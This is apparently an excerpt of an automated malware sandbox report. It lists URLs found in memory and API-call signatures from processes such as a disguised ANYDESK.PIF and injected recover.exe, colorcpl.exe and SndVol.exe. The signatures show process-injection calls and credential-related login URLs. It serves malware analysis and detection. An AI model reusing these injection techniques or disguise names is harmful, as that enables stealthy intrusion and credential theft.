Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0= |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0? |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0= |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0 |
Source: ghf.pif, 00000014.00000000.1782654127.00007FF789D1E000.00000002.00000001.01000000.00000009.sdmp, ghf.pif.18.dr |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR |
Source: colorcpl.exe, 00000023.00000003.2084642052.00000000031AB000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe |
String found in binary or memory: http://geoplugin.net/json.gp |
Source: colorcpl.exe, 00000023.00000003.2078794382.00000000031A9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2136599199.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2084642052.00000000031AB000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gp) |
Source: SndVol.exe, 0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gp/C |
Source: colorcpl.exe, 00000023.00000003.2078794382.00000000031A9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2136599199.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000002.2295912725.00000000031AA000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gpP |
Source: colorcpl.exe, 00000023.00000002.2293950327.0000000003187000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2138790179.000000000317C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/son.gp |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://ocsp.digicert.com0 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://ocsp.digicert.com0: |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://ocsp.digicert.com0H |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://ocsp.digicert.com0I |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://ocsp.digicert.com0Q |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://ocsp.msocsp.com0 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://ocsp.msocsp.com0S |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://www.digicert.com/CPS0 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: http://www.digicert.com/CPS0~ |
Source: recover.exe, recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.ebuddy.com |
Source: recover.exe, recover.exe, 00000035.00000003.2097195467.000000000316D000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, recover.exe, 00000035.00000003.2097309040.000000000316D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.imvu.com |
Source: recover.exe, 00000035.00000003.2097195467.000000000316D000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000035.00000003.2097309040.000000000316D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.imvu.coma |
Source: recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com |
Source: recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.imvu.comr |
Source: recover.exe, 0000002F.00000002.2133255398.00000000005F4000.00000004.00000010.00020000.00000000.sdmp |
String found in binary or memory: http://www.nirsoft.net |
Source: recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.nirsoft.net/ |
Source: ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E863000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1881559620.000000007EDF0000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1859269663.00000000208AA000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E8DE000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory: http://www.pmail.com |
Source: ghf.pif, 00000014.00000000.1782654127.00007FF789D1E000.00000002.00000001.01000000.00000009.sdmp, ghf.pif.18.dr |
String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://0bf8c87e7673b17d24aaf92c4c29ca42.azr.footprintdns.com/apc/trans.gif?6cc2fc022d35de4436d46235 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://0bf8c87e7673b17d24aaf92c4c29ca42.azr.footprintdns.com/apc/trans.gif?97ae33b93885af7139d3f9b0 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://6a1824ae7f5b378648db1f87c4a047c1.azr.footprintdns.com/apc/trans.gif?6aff50c04f9af0461603c0c1 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://6a1824ae7f5b378648db1f87c4a047c1.azr.footprintdns.com/apc/trans.gif?e4d500512ddeced1b68e7640 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://9cf1d93416b343cbb0aa1deae6dc7661.azr.footprintdns.com/apc/trans.gif?67e56b9b06a4d427a359554f |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://9cf1d93416b343cbb0aa1deae6dc7661.azr.footprintdns.com/apc/trans.gif?b4ef4344b8bbbc91cc6b3006 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QWthbWFp |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://ebd871449a8dbfc3efbaabaef620b095.clo.footprintdns.com/apc/trans.gif?2b5ac21b953982869b52cfd6 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://ebd871449a8dbfc3efbaabaef620b095.clo.footprintdns.com/apc/trans.gif?b53a91fd779d41798d7818ff |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a& |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAXr4b&Fr |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://fp-afd.azurefd.net/apc/trans.gif?2b2f77512f7c65b2f52ee30ffe87d61a |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://fp-afd.azurefd.net/apc/trans.gif?355cac43462bdbbb118c6145bdcc88c0 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://fp-afd.azurefd.net/apc/trans.gif?42704eed386765f870e05e14b5b322b7 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://fp-afd.azurefd.net/apc/trans.gif?b21ec88677686eb844798ccd641c5fe5 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?086008d5de6d8b19567a45da7804f652 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?79007fa287900ed2975a809f346f1f62 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com: |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live |
Source: ghf.pif, 00000014.00000000.1782654127.00007FF789D1E000.00000002.00000001.01000000.00000009.sdmp, ghf.pif.18.dr |
String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah |
Source: recover.exe |
String found in binary or memory: https://login.yahoo.com/config/login |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://maps.windows.com/windows-app-web-link |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-06-09-30-15/PreSignInSettingsConfig.json |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-06-09-30-15/PreSignInSettingsConfig.json?One |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=b12f1ec5da72bf506d52 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=e0a3ca |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2bedfa25f63b1e1b9bd24eb0a5625631 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?f60497627d681e8f4d8561fad4b92959 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2 |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://www.digicert.com/CPS0 |
Source: recover.exe, recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: recover.exe |
String found in binary or memory: https://www.google.com/accounts/servicelogin |
Source: bhv3B03.tmp.47.dr |
String found in binary or memory: https://www.office.com/ |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 26_2_02B13380 NtWriteVirtualMemory, |
26_2_02B13380 |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 26_2_02B13034 NtAllocateVirtualMemory, |
26_2_02B13034 |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 26_2_02B19654 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, |
26_2_02B19654 |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 26_2_02B19738 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, |
26_2_02B19738 |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 26_2_02B195CC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, |
26_2_02B195CC |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 26_2_02B16AE0 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx, |
26_2_02B16AE0 |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 26_2_02B1421A GetThreadContext,SetThreadContext,NtResumeThread, |
26_2_02B1421A |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 26_2_02B1421C GetThreadContext,SetThreadContext,NtResumeThread, |
26_2_02B1421C |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 26_2_02B13032 NtAllocateVirtualMemory, |
26_2_02B13032 |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 26_2_02B19578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, |
26_2_02B19578 |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 26_2_02B1399C NtProtectVirtualMemory, |
26_2_02B1399C |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, |
47_2_0040BAE3 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 49_2_004016FD NtdllDefWindowProc_A, |
49_2_004016FD |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 49_2_004017B7 NtdllDefWindowProc_A, |
49_2_004017B7 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 53_2_00402CAC NtdllDefWindowProc_A, |
53_2_00402CAC |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 53_2_00402D66 NtdllDefWindowProc_A, |
53_2_00402D66 |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 60_2_02A36AE0 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx, |
60_2_02A36AE0 |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 60_2_02A33380 NtWriteVirtualMemory, |
60_2_02A33380 |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 60_2_02A33034 NtAllocateVirtualMemory, |
60_2_02A33034 |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 60_2_02A39738 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, |
60_2_02A39738 |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 60_2_02A33A34 NtProtectVirtualMemory, |
60_2_02A33A34 |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 60_2_02A3421A Toolhelp32ReadProcessMemory,Thread32Next,GetThreadContext,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Toolhelp32ReadProcessMemory,Heap32ListFirst,SetThreadContext,NtResumeThread,Thread32Next, |
60_2_02A3421A |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 60_2_02A3421C Toolhelp32ReadProcessMemory,Thread32Next,GetThreadContext,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Toolhelp32ReadProcessMemory,Heap32ListFirst,SetThreadContext,NtResumeThread,Thread32Next, |
60_2_02A3421C |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 60_2_02A33032 NtAllocateVirtualMemory, |
60_2_02A33032 |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 60_2_02A39809 NtQueryInformationFile,NtReadFile,NtClose, |
60_2_02A39809 |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 60_2_02A3399C NtProtectVirtualMemory, |
60_2_02A3399C |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 60_2_02A39654 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose, |
60_2_02A39654 |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 60_2_02A3341B NtWriteVirtualMemory, |
60_2_02A3341B |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 60_2_02A395CC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, |
60_2_02A395CC |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 60_2_02A39578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, |
60_2_02A39578 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0041C077 OpenProcess,NtSuspendProcess,CloseHandle, |
62_2_0041C077 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0041C0A3 OpenProcess,NtResumeProcess,CloseHandle, |
62_2_0041C0A3 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0684CF05 OpenProcess,NtSuspendProcess,CloseHandle, |
62_2_0684CF05 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0684CF31 OpenProcess,NtResumeProcess,CloseHandle, |
62_2_0684CF31 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0684EB56 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA, |
62_2_0684EB56 |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 26_2_02B020B4 |
26_2_02B020B4 |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Code function: 35_2_05377194 |
35_2_05377194 |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Code function: 35_2_0536B5C1 |
35_2_0536B5C1 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_0044A030 |
47_2_0044A030 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_0040612B |
47_2_0040612B |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_0043E13D |
47_2_0043E13D |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_0044B188 |
47_2_0044B188 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_00442273 |
47_2_00442273 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_0044D380 |
47_2_0044D380 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_0044A5F0 |
47_2_0044A5F0 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_004125F6 |
47_2_004125F6 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_004065BF |
47_2_004065BF |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_004086CB |
47_2_004086CB |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_004066BC |
47_2_004066BC |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_0044D760 |
47_2_0044D760 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_00405A40 |
47_2_00405A40 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_00449A40 |
47_2_00449A40 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_00405AB1 |
47_2_00405AB1 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_00405B22 |
47_2_00405B22 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_0044ABC0 |
47_2_0044ABC0 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_00405BB3 |
47_2_00405BB3 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_00417C60 |
47_2_00417C60 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_0044CC70 |
47_2_0044CC70 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_00418CC9 |
47_2_00418CC9 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_0044CDFB |
47_2_0044CDFB |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_0044CDA0 |
47_2_0044CDA0 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_0044AE20 |
47_2_0044AE20 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_00415E3E |
47_2_00415E3E |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 47_2_00437F3B |
47_2_00437F3B |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 49_2_00405038 |
49_2_00405038 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 49_2_0041208C |
49_2_0041208C |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 49_2_004050A9 |
49_2_004050A9 |
